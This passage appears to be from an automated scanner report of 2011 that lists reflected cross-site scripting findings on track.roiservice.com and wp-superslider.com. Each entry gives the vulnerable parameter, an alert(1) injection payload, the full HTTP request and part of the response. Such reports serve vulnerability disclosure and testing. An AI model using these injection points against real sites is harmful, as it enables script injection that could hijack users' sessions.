Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content ...[SNIP]... <a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpagea978a"><script>alert(1)</script>2b441ed7164&title=refpage&tag=refpage&text=refpage"> ...[SNIP]...
The value of the ROIID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5d61'%3balert(1)//83d5529551f was submitted in the ROIID parameter. This input was echoed as e5d61';alert(1)//83d5529551f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /track/track.aspx?ROIID=936138107000019e5d61'%3balert(1)//83d5529551f HTTP/1.1
Host: track.roiservice.com
Proxy-Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: msid938956107000029=06dd214c75b14fd39004a5e41502868d
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:42 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSA ADM OUR IND NAV COM"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: msid936138107000019e5d61';alert(1)//83d5529551f=ddc990c0fc744d2cbe0ff4ded6312952; domain=.roiservice.com; expires=Sun, 02-Feb-2031 15:42:42 GMT; path=/
Set-Cookie: GTT936138107000019e5d61';alert(1)//83d5529551f=ddc990c0fc744d2cbe0ff4ded6312952; domain=.roiservice.com; path=/
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 1656
1.176. http://wp-superslider.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://wp-superslider.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce46"><script>alert(1)</script>2b12960bb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ce46\"><script>alert(1)</script>2b12960bb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?2ce46"><script>alert(1)</script>2b12960bb2=1 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba1c7"><script>alert(1)</script>59b95746b00 was submitted in the REST URL parameter 1. This input was echoed as ba1c7\"><script>alert(1)</script>59b95746b00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.phpba1c7"><script>alert(1)</script>59b95746b00 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674627+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674628; expires=Thu, 02-Feb-2012 19:23:48 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53197
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427c3"><script>alert(1)</script>6ae2ba26414 was submitted in the REST URL parameter 1. This input was echoed as 427c3\"><script>alert(1)</script>6ae2ba26414 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site427c3"><script>alert(1)</script>6ae2ba26414/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:02 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5400"><script>alert(1)</script>18ede8274ac was submitted in the REST URL parameter 2. This input was echoed as b5400\"><script>alert(1)</script>18ede8274ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contentb5400"><script>alert(1)</script>18ede8274ac/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29535"><script>alert(1)</script>bb1a33e1d72 was submitted in the REST URL parameter 3. This input was echoed as 29535\"><script>alert(1)</script>bb1a33e1d72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins29535"><script>alert(1)</script>bb1a33e1d72/si-contact-form/captcha-secureimage/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcc9c"><script>alert(1)</script>406f3f1b80a was submitted in the REST URL parameter 4. This input was echoed as fcc9c\"><script>alert(1)</script>406f3f1b80a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/si-contact-formfcc9c"><script>alert(1)</script>406f3f1b80a/captcha-secureimage/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21998"><script>alert(1)</script>61808997102 was submitted in the REST URL parameter 5. This input was echoed as 21998\"><script>alert(1)</script>61808997102 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/si-contact-form/captcha-secureimage21998"><script>alert(1)</script>61808997102/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674589+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be147"><script>alert(1)</script>60a126f5ab0 was submitted in the REST URL parameter 6. This input was echoed as be147\"><script>alert(1)</script>60a126f5ab0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.jsbe147"><script>alert(1)</script>60a126f5ab0 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:11 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674591+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674591; expires=Thu, 02-Feb-2012 19:23:11 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82727"><script>alert(1)</script>61afe33f333 was submitted in the REST URL parameter 1. This input was echoed as 82727\"><script>alert(1)</script>61afe33f333 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site82727"><script>alert(1)</script>61afe33f333/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674542+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674542; expires=Thu, 02-Feb-2012 19:22:22 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:22 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8345f"><script>alert(1)</script>a5d18f0e20a was submitted in the REST URL parameter 2. This input was echoed as 8345f\"><script>alert(1)</script>a5d18f0e20a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content8345f"><script>alert(1)</script>a5d18f0e20a/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674544+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674544; expires=Thu, 02-Feb-2012 19:22:24 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:24 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b6e4"><script>alert(1)</script>1a8376b51b was submitted in the REST URL parameter 3. This input was echoed as 2b6e4\"><script>alert(1)</script>1a8376b51b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins2b6e4"><script>alert(1)</script>1a8376b51b/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8dbd"><script>alert(1)</script>faa582e2f65 was submitted in the REST URL parameter 4. This input was echoed as c8dbd\"><script>alert(1)</script>faa582e2f65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerptc8dbd"><script>alert(1)</script>faa582e2f65/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674547+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674547; expires=Thu, 02-Feb-2012 19:22:27 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:27 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367a3"><script>alert(1)</script>72b3425ad17 was submitted in the REST URL parameter 5. This input was echoed as 367a3\"><script>alert(1)</script>72b3425ad17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerpt/plugin-data367a3"><script>alert(1)</script>72b3425ad17/superslider/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674548+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674549; expires=Thu, 02-Feb-2012 19:22:29 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:29 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51aa1"><script>alert(1)</script>6001cc5eecf was submitted in the REST URL parameter 6. This input was echoed as 51aa1\"><script>alert(1)</script>6001cc5eecf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider51aa1"><script>alert(1)</script>6001cc5eecf/ssExcerpt/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:30 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674551+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674551; expires=Thu, 02-Feb-2012 19:22:31 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53460

